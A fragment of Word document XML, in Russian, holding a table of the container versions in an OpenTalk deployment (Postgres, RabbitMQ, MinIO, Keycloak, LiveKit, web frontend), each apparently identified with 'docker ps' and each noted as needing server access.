          <w:p w14:paraId="431978B1" w14:textId="4EF2BFFC" w:rsidR="00EA0F3B" w:rsidRPr="004A7A62" w:rsidRDefault="004A7A62" w:rsidP="004B22D3">
            <w:pPr>
              <w:pStyle w:val="1120"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004A7A62">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>«</w:t>
            </w:r>
            <w:r w:rsidR="00C54DEE" w:rsidRPr="007E74C8">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Postgres</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidR="00C54DEE" w:rsidRPr="007E74C8">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>:17.7</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidR="00543FA1" w:rsidRPr="007E74C8">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> opentalk-postgres-1</w:t>
            </w:r>
            <w:r w:rsidRPr="004A7A62">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>»</w:t>
            </w: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E615" w14:textId="08E6CB36" w:rsidR="00EA0F3B" w:rsidRPr="001E10ED" w:rsidRDefault="00543FA1" w:rsidP="004B22D3">
            <w:pPr>
              <w:pStyle w:val="1120"/>
            </w:pPr>
            <w:r w:rsidRPr="001E10ED">
              <w:t xml:space="preserve">Версия БД </w:t>
            </w:r>
            <w:r w:rsidR="006B5B72" w:rsidRPr="006B5B72">
              <w:t>(</w:t>
            </w:r>
            <w:r w:rsidR="006B5B72">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>P</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="001E10ED">
              <w:t>ostgres</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="001E10ED">
              <w:t xml:space="preserve"> 17.7</w:t>
            </w:r>
            <w:r w:rsidR="006B5B72" w:rsidRPr="006B5B72">
              <w:t>)</w:t>
            </w:r>
            <w:r w:rsidRPr="001E10ED">
              <w:t xml:space="preserve"> выявляется по запросу </w:t>
            </w:r>
            <w:r w:rsidR="004A7A62" w:rsidRPr="004A7A62">
              <w:t>«</w:t>
            </w:r>
            <w:r w:rsidRPr="006B5B72">
              <w:rPr>
                <w:rStyle w:val="1fa"/>
              </w:rPr>
              <w:t>docker</w:t>
            </w:r>
            <w:r w:rsidRPr="00633879">
              <w:rPr>
                <w:rStyle w:val="1fa"/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="006B5B72">
              <w:rPr>
                <w:rStyle w:val="1fa"/>
              </w:rPr>
              <w:t>ps</w:t>
            </w:r>
            <w:r w:rsidR="004A7A62" w:rsidRPr="00495F80">
              <w:t>»</w:t>
            </w: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8DEB" w14:textId="1D9FB5B1" w:rsidR="00EA0F3B" w:rsidRPr="001E10ED" w:rsidRDefault="00543FA1" w:rsidP="004B22D3">
            <w:pPr>
              <w:pStyle w:val="1120"/>
            </w:pPr>
            <w:r w:rsidRPr="001E10ED">
              <w:t>Должен быть доступ к серверу</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D752A2" w:rsidRPr="001E10ED" w14:paraId="0592445C" w14:textId="77777777" w:rsidTr="004A7A62">
        <w:trPr>
          <w:cantSplit/>
          <w:jc w:val="center"/>
        </w:trPr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0EB9" w14:textId="17069775" w:rsidR="00D752A2" w:rsidRPr="001E10ED" w:rsidRDefault="00D752A2" w:rsidP="004B22D3">
            <w:pPr>
              <w:pStyle w:val="1120"/>
            </w:pPr>
            <w:r w:rsidRPr="001E10ED">
              <w:t>3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A17A" w14:textId="274FC03E" w:rsidR="00D752A2" w:rsidRPr="001E10ED" w:rsidRDefault="004A7A62" w:rsidP="004B22D3">
            <w:pPr>
              <w:pStyle w:val="1120"/>
            </w:pPr>
            <w:r w:rsidRPr="009A505E">
              <w:t>«</w:t>
            </w:r>
            <w:r w:rsidR="00763E44">
              <w:t>Rabbit</w:t>
            </w:r>
            <w:r w:rsidR="006B5B72">
              <w:t>MQ</w:t>
            </w:r>
            <w:r w:rsidR="00D752A2" w:rsidRPr="001E10ED">
              <w:t>:4.2.</w:t>
            </w:r>
            <w:r w:rsidR="00C54DEE" w:rsidRPr="001E10ED">
              <w:t>7 opentalk</w:t>
            </w:r>
            <w:r w:rsidR="00D752A2" w:rsidRPr="001E10ED">
              <w:t>-</w:t>
            </w:r>
            <w:r w:rsidR="00763E44">
              <w:t>Rabbit</w:t>
            </w:r>
            <w:r w:rsidR="00D752A2" w:rsidRPr="001E10ED">
              <w:t>-1</w:t>
            </w:r>
            <w:r w:rsidRPr="00495F80">
              <w:t>»</w:t>
            </w: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B018" w14:textId="374F12D1" w:rsidR="00D752A2" w:rsidRPr="001E10ED" w:rsidRDefault="00D752A2" w:rsidP="004B22D3">
            <w:pPr>
              <w:pStyle w:val="1120"/>
            </w:pPr>
            <w:r w:rsidRPr="001E10ED">
              <w:t xml:space="preserve">Версия </w:t>
            </w:r>
            <w:r w:rsidR="004A7A62" w:rsidRPr="004A7A62">
              <w:t>«</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="00763E44">
              <w:t>Rabbit</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="001E10ED">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00D752A2">
              <w:t>4.2</w:t>
            </w:r>
            <w:r w:rsidRPr="001E10ED">
              <w:t>.7</w:t>
            </w:r>
            <w:r w:rsidR="004A7A62" w:rsidRPr="00495F80">
              <w:t>»</w:t>
            </w:r>
            <w:r w:rsidRPr="001E10ED">
              <w:t xml:space="preserve"> выявляется по запросу </w:t>
            </w:r>
            <w:r w:rsidR="004A7A62" w:rsidRPr="004A7A62">
              <w:t>«</w:t>
            </w:r>
            <w:r w:rsidRPr="006B5B72">
              <w:rPr>
                <w:rStyle w:val="1fa"/>
              </w:rPr>
              <w:t>docker</w:t>
            </w:r>
            <w:r w:rsidRPr="00763E44">
              <w:rPr>
                <w:rStyle w:val="1fa"/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="006B5B72">
              <w:rPr>
                <w:rStyle w:val="1fa"/>
              </w:rPr>
              <w:t>ps</w:t>
            </w:r>
            <w:r w:rsidR="004A7A62" w:rsidRPr="00495F80">
              <w:t>»</w:t>
            </w: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5C57" w14:textId="357F9471" w:rsidR="00D752A2" w:rsidRPr="001E10ED" w:rsidRDefault="006F72DC" w:rsidP="004B22D3">
            <w:pPr>
              <w:pStyle w:val="1120"/>
            </w:pPr>
            <w:r w:rsidRPr="001E10ED">
              <w:t>Должен быть доступ к серверу</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D752A2" w:rsidRPr="00D752A2" w14:paraId="6C0E98FA" w14:textId="77777777" w:rsidTr="004A7A62">
        <w:trPr>
          <w:cantSplit/>
          <w:jc w:val="center"/>
        </w:trPr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48B65" w14:textId="72ED1122" w:rsidR="00D752A2" w:rsidRPr="001E10ED" w:rsidRDefault="00D752A2" w:rsidP="004B22D3">
            <w:pPr>
              <w:pStyle w:val="1120"/>
            </w:pPr>
            <w:r w:rsidRPr="001E10ED">
              <w:t>4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45386" w14:textId="576814CC" w:rsidR="00D752A2" w:rsidRPr="00D534FC" w:rsidRDefault="004A7A62" w:rsidP="004B22D3">
            <w:pPr>
              <w:pStyle w:val="1120"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004A7A62">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>«</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="00D752A2" w:rsidRPr="001E10ED">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>minio</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="00D752A2" w:rsidRPr="001E10ED">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidR="00C54DEE" w:rsidRPr="001E10ED">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>minio:RELEASE</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidR="00D752A2" w:rsidRPr="001E10ED">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>.2025-06-13T11-33-47Z opentalk-minio-1</w:t>
            </w:r>
            <w:r w:rsidRPr="00D534FC">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>»</w:t>
            </w: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3852" w14:textId="22F6B636" w:rsidR="004A7A62" w:rsidRPr="006B5B72" w:rsidRDefault="006F72DC" w:rsidP="004B22D3">
            <w:pPr>
              <w:pStyle w:val="1120"/>
            </w:pPr>
            <w:r w:rsidRPr="001E10ED">
              <w:t xml:space="preserve">Версия </w:t>
            </w:r>
            <w:r w:rsidR="006B5B72" w:rsidRPr="00633879">
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="001E10ED">
              <w:t>minio</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="00D752A2" w:rsidRPr="001E10ED">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00D752A2">
              <w:t>2025</w:t>
            </w:r>
            <w:r w:rsidRPr="006F72DC">
              <w:t>-</w:t>
            </w:r>
            <w:r w:rsidRPr="00D752A2">
              <w:t>06</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidR="00D752A2" w:rsidRPr="00D752A2">
              <w:t>-13</w:t>
            </w:r>
            <w:r w:rsidR="00D752A2" w:rsidRPr="001E10ED">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>T</w:t>
            </w:r>
            <w:r w:rsidR="00D752A2" w:rsidRPr="00D752A2">
              <w:t>11-33-47</w:t>
            </w:r>
            <w:r w:rsidR="00D752A2" w:rsidRPr="001E10ED">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Z</w:t>
            </w:r>
            <w:r w:rsidR="006B5B72" w:rsidRPr="006B5B72">
              <w:t>)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0B64E724" w14:textId="77BF0275" w:rsidR="00D752A2" w:rsidRPr="00D752A2" w:rsidRDefault="00D752A2" w:rsidP="004B22D3">
            <w:pPr>
              <w:pStyle w:val="1120"/>
            </w:pPr>
            <w:r w:rsidRPr="001E10ED">
              <w:t xml:space="preserve">выявляется по запросу </w:t>
            </w:r>
            <w:r w:rsidR="004A7A62" w:rsidRPr="004A7A62">
              <w:t>«</w:t>
            </w:r>
            <w:r w:rsidR="004A7A62" w:rsidRPr="006B5B72">
              <w:rPr>
                <w:rStyle w:val="1fa"/>
              </w:rPr>
              <w:t>docker</w:t>
            </w:r>
            <w:r w:rsidR="004A7A62" w:rsidRPr="006B5B72">
              <w:rPr>
                <w:rStyle w:val="1fa"/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="004A7A62" w:rsidRPr="006B5B72">
              <w:rPr>
                <w:rStyle w:val="1fa"/>
              </w:rPr>
              <w:t>ps</w:t>
            </w:r>
            <w:r w:rsidR="004A7A62" w:rsidRPr="00495F80">
              <w:t>»</w:t>
            </w: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110B" w14:textId="107C201A" w:rsidR="00D752A2" w:rsidRPr="00D752A2" w:rsidRDefault="006F72DC" w:rsidP="004B22D3">
            <w:pPr>
              <w:pStyle w:val="1120"/>
            </w:pPr>
            <w:r w:rsidRPr="001E10ED">
              <w:t>Должен быть доступ к серверу</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D752A2" w:rsidRPr="00D752A2" w14:paraId="0EC42D32" w14:textId="77777777" w:rsidTr="004A7A62">
        <w:trPr>
          <w:cantSplit/>
          <w:jc w:val="center"/>
        </w:trPr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A1B0" w14:textId="0BB736F2" w:rsidR="00D752A2" w:rsidRPr="001E10ED" w:rsidRDefault="00D752A2" w:rsidP="004B22D3">
            <w:pPr>
              <w:pStyle w:val="1120"/>
            </w:pPr>
            <w:r w:rsidRPr="001E10ED">
              <w:t>5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A1F1" w14:textId="164CA9CB" w:rsidR="00D752A2" w:rsidRPr="004A7A62" w:rsidRDefault="004A7A62" w:rsidP="004B22D3">
            <w:pPr>
              <w:pStyle w:val="1120"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004A7A62">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>«</w:t>
            </w:r>
            <w:r w:rsidR="00D752A2" w:rsidRPr="001E10ED">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>quay.io/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="001F04CB">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Keycloak</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="00D752A2" w:rsidRPr="001E10ED">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:r w:rsidR="001F04CB">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Keycloak</w:t>
            </w:r>
            <w:r w:rsidR="00D752A2" w:rsidRPr="001E10ED">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>:26.5.7 opentalk-</w:t>
            </w:r>
            <w:r w:rsidR="001F04CB">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Keycloak</w:t>
            </w:r>
            <w:r w:rsidR="00D752A2" w:rsidRPr="001E10ED">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>-1</w:t>
            </w:r>
            <w:r w:rsidRPr="004A7A62">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>»</w:t>
            </w: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A5EA" w14:textId="6DB8FA40" w:rsidR="00D752A2" w:rsidRPr="00D752A2" w:rsidRDefault="00D752A2" w:rsidP="004B22D3">
            <w:pPr>
              <w:pStyle w:val="1120"/>
            </w:pPr>
            <w:r w:rsidRPr="001E10ED">
              <w:t xml:space="preserve">Версия </w:t>
            </w:r>
            <w:r w:rsidR="006B5B72" w:rsidRPr="006B5B72">
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>ke</w:t>
            </w:r>
            <w:r w:rsidR="006B5B72">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>y</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>cloak</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="001E10ED">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00D752A2">
              <w:t>26</w:t>
            </w:r>
            <w:r w:rsidRPr="001E10ED">
              <w:t>.</w:t>
            </w:r>
            <w:r w:rsidRPr="00D752A2">
              <w:t>5.</w:t>
            </w:r>
            <w:r w:rsidRPr="001E10ED">
              <w:t>7</w:t>
            </w:r>
            <w:r w:rsidR="006B5B72" w:rsidRPr="006B5B72">
              <w:t xml:space="preserve">) </w:t>
            </w:r>
            <w:r w:rsidRPr="001E10ED">
              <w:t xml:space="preserve">выявляется по запросу </w:t>
            </w:r>
            <w:r w:rsidR="004A7A62" w:rsidRPr="004A7A62">
              <w:t>«</w:t>
            </w:r>
            <w:r w:rsidR="004A7A62" w:rsidRPr="006B5B72">
              <w:rPr>
                <w:rStyle w:val="1fa"/>
              </w:rPr>
              <w:t>docker</w:t>
            </w:r>
            <w:r w:rsidR="004A7A62" w:rsidRPr="006B5B72">
              <w:rPr>
                <w:rStyle w:val="1fa"/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="004A7A62" w:rsidRPr="006B5B72">
              <w:rPr>
                <w:rStyle w:val="1fa"/>
              </w:rPr>
              <w:t>ps</w:t>
            </w:r>
            <w:r w:rsidR="004A7A62" w:rsidRPr="00495F80">
              <w:t>»</w:t>
            </w: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0FC83" w14:textId="3C8683D1" w:rsidR="00D752A2" w:rsidRPr="00D752A2" w:rsidRDefault="006F72DC" w:rsidP="004B22D3">
            <w:pPr>
              <w:pStyle w:val="1120"/>
            </w:pPr>
            <w:r w:rsidRPr="001E10ED">
              <w:t>Должен быть доступ к серверу</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D752A2" w:rsidRPr="00D752A2" w14:paraId="3CD8726E" w14:textId="77777777" w:rsidTr="004A7A62">
        <w:trPr>
          <w:cantSplit/>
          <w:jc w:val="center"/>
        </w:trPr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8AA6" w14:textId="56AAAB32" w:rsidR="00D752A2" w:rsidRPr="001E10ED" w:rsidRDefault="00D752A2" w:rsidP="004B22D3">
            <w:pPr>
              <w:pStyle w:val="1120"/>
            </w:pPr>
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>6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C0AD4" w14:textId="3D607761" w:rsidR="00D752A2" w:rsidRPr="004A7A62" w:rsidRDefault="004A7A62" w:rsidP="004B22D3">
            <w:pPr>
              <w:pStyle w:val="1120"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004A7A62">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>«</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="00763E44">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>LiveKit</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="00D752A2" w:rsidRPr="001E10ED">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:r w:rsidR="00763E44">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>LiveKit</w:t>
            </w:r>
            <w:r w:rsidR="00D752A2" w:rsidRPr="001E10ED">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>-</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidR="00D752A2" w:rsidRPr="001E10ED">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>server:v</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidR="00D752A2" w:rsidRPr="001E10ED">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>1.9.12 opentalk-</w:t>
            </w:r>
            <w:r w:rsidR="00763E44">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>LiveKit</w:t>
            </w:r>
            <w:r w:rsidR="00D752A2" w:rsidRPr="001E10ED">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>-1</w:t>
            </w:r>
            <w:r w:rsidRPr="004A7A62">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>»</w:t>
            </w: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18B2" w14:textId="35788082" w:rsidR="00D752A2" w:rsidRPr="00D752A2" w:rsidRDefault="00D752A2" w:rsidP="004B22D3">
            <w:pPr>
              <w:pStyle w:val="1120"/>
            </w:pPr>
            <w:r w:rsidRPr="001E10ED">
              <w:t xml:space="preserve">Версия </w:t>
            </w:r>
            <w:r w:rsidR="006B5B72" w:rsidRPr="006B5B72">
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="00763E44">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>LiveKit</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00D752A2">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="001E10ED">
              <w:t>1.</w:t>
            </w:r>
            <w:r w:rsidRPr="00D752A2">
              <w:t>9.12</w:t>
            </w:r>
            <w:r w:rsidR="006B5B72" w:rsidRPr="006B5B72">
              <w:t xml:space="preserve">) </w:t>
            </w:r>
            <w:r w:rsidRPr="001E10ED">
              <w:t xml:space="preserve">выявляется по запросу </w:t>
            </w:r>
            <w:r w:rsidR="004A7A62" w:rsidRPr="004A7A62">
              <w:t>«</w:t>
            </w:r>
            <w:r w:rsidR="004A7A62" w:rsidRPr="006B5B72">
              <w:rPr>
                <w:rStyle w:val="1fa"/>
              </w:rPr>
              <w:t>docker</w:t>
            </w:r>
            <w:r w:rsidR="004A7A62" w:rsidRPr="006B5B72">
              <w:rPr>
                <w:rStyle w:val="1fa"/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="004A7A62" w:rsidRPr="006B5B72">
              <w:rPr>
                <w:rStyle w:val="1fa"/>
              </w:rPr>
              <w:t>ps</w:t>
            </w:r>
            <w:r w:rsidR="004A7A62" w:rsidRPr="00495F80">
              <w:t>»</w:t>
            </w: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288C" w14:textId="48ACCD94" w:rsidR="00D752A2" w:rsidRPr="00D752A2" w:rsidRDefault="006F72DC" w:rsidP="004B22D3">
            <w:pPr>
              <w:pStyle w:val="1120"/>
            </w:pPr>
            <w:r w:rsidRPr="001E10ED">
              <w:t>Должен быть доступ к серверу</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D752A2" w:rsidRPr="00D752A2" w14:paraId="21ECB006" w14:textId="77777777" w:rsidTr="004A7A62">
        <w:trPr>
          <w:cantSplit/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3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03CA" w14:textId="6C7670B5" w:rsidR="00D752A2" w:rsidRPr="001E10ED" w:rsidRDefault="00D752A2" w:rsidP="004B22D3">
            <w:pPr>
              <w:pStyle w:val="1120"/>
            </w:pPr>
            <w:r>
              <w:t>7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0BE2" w14:textId="4D69C45E" w:rsidR="00D752A2" w:rsidRPr="00D534FC" w:rsidRDefault="004A7A62" w:rsidP="004B22D3">
            <w:pPr>
              <w:pStyle w:val="1120"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004A7A62">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>«</w:t>
            </w:r>
            <w:r w:rsidR="00D752A2" w:rsidRPr="001E10ED">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>registry.opencode.de/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="00D752A2" w:rsidRPr="001E10ED">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>opentalk</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="00D752A2" w:rsidRPr="001E10ED">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>/web-</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidR="00D752A2" w:rsidRPr="001E10ED">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>frontend:v</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidR="00D752A2" w:rsidRPr="001E10ED">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>2.8.3 opentalk-web-frontend-1</w:t>
            </w:r>
            <w:r w:rsidR="00D534FC" w:rsidRPr="00D534FC">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>»</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8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E372" w14:textId="0AA2B77B" w:rsidR="00D752A2" w:rsidRPr="00D752A2" w:rsidRDefault="00D752A2" w:rsidP="004B22D3">
            <w:pPr>
              <w:pStyle w:val="1120"/>
            </w:pPr>
            <w:r w:rsidRPr="001E10ED">
              <w:t xml:space="preserve">Версия </w:t>
            </w:r>
            <w:r w:rsidR="006F72DC">
              <w:t xml:space="preserve">контейнера </w:t>
            </w:r>
            <w:r w:rsidR="006B5B72" w:rsidRPr="006B5B72">
              <w:t>(</w:t>
            </w:r>
            <w:r w:rsidR="006F72DC">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>web</w:t>
            </w:r>
            <w:r w:rsidR="006F72DC" w:rsidRPr="006F72DC">
              <w:t>-</w:t>
            </w:r>
            <w:r w:rsidR="006F72DC">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>frontend</w:t>
            </w:r>
            <w:r w:rsidR="006F72DC" w:rsidRPr="006F72DC">
              <w:t xml:space="preserve"> 2.8.3</w:t>
            </w:r>
            <w:r w:rsidR="006B5B72" w:rsidRPr="006B5B72">
              <w:t>)</w:t>
            </w:r>
            <w:r w:rsidRPr="001E10ED">
              <w:t xml:space="preserve"> выявляется по запросу </w:t>
            </w:r>
            <w:r w:rsidR="004A7A62" w:rsidRPr="00633879">
              <w:rPr>
                <w:rStyle w:val="1fa"/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:t>«</w:t>
            </w:r>
            <w:r w:rsidRPr="006B5B72">
              <w:rPr>
                <w:rStyle w:val="1fa"/>
              </w:rPr>
              <w:t>docker</w:t>
            </w:r>
            <w:r w:rsidRPr="00633879">
              <w:rPr>
                <w:rStyle w:val="1fa"/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="006B5B72">
              <w:rPr>
                <w:rStyle w:val="1fa"/>
              </w:rPr>
              <w:t>ps</w:t>
            </w:r>
            <w:r w:rsidR="00D534FC" w:rsidRPr="00633879">
              <w:rPr>
                <w:rStyle w:val="1fa"/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:t>»</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9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807A" w14:textId="485C94FB" w:rsidR="00D752A2" w:rsidRPr="00D752A2" w:rsidRDefault="006F72DC" w:rsidP="004B22D3">
            <w:pPr>
              <w:pStyle w:val="1120"/>
            </w:pPr>
            <w:r w:rsidRPr="001E10ED">
              <w:t>Должен быть доступ к серверу</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="32CC0870" w14:textId="77777777" w:rsidR="008A54AF" w:rsidRPr="007E74C8" w:rsidRDefault="008A54AF" w:rsidP="008A54AF">
      <w:pPr>
        <w:pStyle w:val="1f1"/>
        <w:ind w:firstLine="709"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="518EA8D7" w14:textId="77777777" w:rsidR="006F72DC" w:rsidRDefault="006F72DC" w:rsidP="004A7A62">
      <w:pPr>
        <w:pStyle w:val="1f6"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3DEA3F70" wp14:editId="114E6B82">
            <wp:extent cx="5666642" cy="1472945"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="3007391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875" cy="148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EB6B" w14:textId="121295B8" w:rsidR="004A7A62" w:rsidRDefault="004A7A62" w:rsidP="004A7A62">
      <w:pPr>
        <w:pStyle w:val="18"/>
      </w:pPr>
      <w:bookmarkStart w:id="11" w:name="_Ref234281845"/>
      <w:r>
        <w:t xml:space="preserve">Информация по запросу </w:t>
      </w:r>
      <w:r w:rsidRPr="00633879">
        <w:rPr>
          <w:rStyle w:val="1fa"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="006B5B72">
        <w:rPr>
          <w:rStyle w:val="1fa"/>
        </w:rPr>
        <w:t>docker</w:t>
      </w:r>
      <w:r w:rsidRPr="00633879">
        <w:rPr>
          <w:rStyle w:val="1fa"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="006B5B72">
        <w:rPr>
          <w:rStyle w:val="1fa"/>
        </w:rPr>
        <w:t>ps</w:t>
      </w:r>
      <w:r w:rsidR="00D534FC" w:rsidRPr="00633879">
        <w:rPr>
          <w:rStyle w:val="1fa"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
